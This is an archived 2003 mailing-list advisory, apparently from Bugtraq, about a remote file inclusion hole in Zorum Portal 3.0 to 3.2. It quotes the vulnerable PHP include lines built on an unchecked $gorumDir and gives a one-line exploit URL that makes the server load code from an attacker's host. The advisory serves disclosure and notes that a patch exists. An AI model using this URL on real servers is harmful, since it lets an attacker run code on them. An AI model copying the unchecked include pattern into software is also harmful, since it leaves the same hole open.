A patch has been created for this hole and can be found on http://www.phpsecure.org/. >From: MGhz <magasat_private> >To: bugtraqat_private >Subject: Zorum Portal (PHP) >Date: 22 Jan 2003 19:45:26 -0000 > > > >Version : 3.0;3.1;3.2 >Website : http://zorum.phpoutsourcing.com/ >Problem : Include file > > >File: >--------------------------------- >include.php >--------------------------------- > >PHP Code: >--------------------------------- >[...] >include("$gorumDir/generformlib_multipleselection.php"); >include("$gorumDir/generformlib_groupselection.php"); >include("$gorumDir/generformlib_filebutton.php"); >include("$gorumDir/group.php"); >[...] >--------------------------------- > >Exploit : >--------------------------------- >http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ >--> >include http://[attacker]/group.php on remote server >--------------------------------- > >-- >magasat_private _________________________________________________________________
This archive was generated by hypermail 2b30 : Mon Jan 27 2003 - 08:57:28 PST